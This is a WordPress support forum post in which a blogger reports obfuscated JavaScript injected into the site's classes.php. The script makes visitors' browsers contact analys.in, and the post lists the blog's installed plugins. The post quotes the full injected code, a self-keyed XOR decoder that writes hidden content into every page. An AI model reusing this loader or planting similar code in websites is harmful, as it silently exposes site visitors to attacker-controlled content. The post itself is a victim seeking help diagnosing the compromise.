Mysterious code added to classes.php
-
I found my browser running to
analys.inevery time a page on my blog loads. Upon further examination, analys.in has its nameservers set topc-banking.cn. So I suspect this is some Chinese network collecting information.I have no clue how they managed to get to the files (I have a very strong password, and I couldn’t find anything in bash history which goes back a couple of months). I checked every installed plugin and couldn’t find any references to the code that was added.
The specific code that was added?
<script type="text/javascript">function rsec(ggqgbleb) { function qqwze(szxtge) { var vnus = 0; var dmawfmw = szxtge.length; var ioqlo = 0; while (ioqlo < dmawfmw) { vnus += (szxtge.charCodeAt(ioqlo))*dmawfmw%255; ioqlo++; } return vnus%255; } ggqgbleb=unescape(ggqgbleb); try {var rxgz=arguments.callee;} catch(dgnesfhr){alert(dgnesfhr);} imcza=(new String(rxgz)).replace(/[^@a-z0-9A-Z_.,-]/g, ''); gnzp=qqwze(imcza); vtxfolfz=""; var ogqvggy = 0; for(dxgcgll=0;dxgcgll<ggqgbleb.length;dxgcgll++) { vtxfolfz += String.fromCharCode(ggqgbleb.charCodeAt(dxgcgll)^gnzp^imcza.charCodeAt(dxgcgll)^dxgcgll%255^ogqvggy%255); ogqvggy++; if (ogqvggy > imcza.length) ogqvggy = 0; } document.write(vtxfolfz); }rsec("%9F%D9%CD%D4%D0%C1%CF%8B%C4%C4%C3%9B%80%CA%C0%D6%D7%93%8F%88%C2%DE%CA%CA%C8%DF%84%C2%DA%9B%C1%CB%C1%C2%90%D4%DF%8C%C3%D4%CD%88%80%89%90%C5%81%CA%C8%D2%9C%8A%D2%DB%D0%C1%D0%DF%D3%D4%C5%DB%9A%CB%C1%C9%CF%C6%D4%C3%88%84%D3%C5%D9%C4%C5%CB%8C%88%8D%C2%C6%CE%C9%88%94%DE%C3%C5%DC%CC%8F%81%98%90%93%C3%D5%DF%D1%D7%C9%8C%80%90%C9%98%91%8B%DE%E0%D8%C0%CD%E1%8F%8C%8A");</script>Plugins I have installed:
1 Blog Cacher Add To Any Adsense-Deluxe All in One SEO Pack del.icio.us - Bookmark This Google XML Sitemaps PHP Speedy WP Spam Karma 2 Textile 2 (Improved) WordPress Database Backup WP-ContactForm WP-DBManagerI am stumped. Is this part of the same Chinese botnet news from a few days back??
- The topic ‘Mysterious code added to classes.php’ is closed to new replies.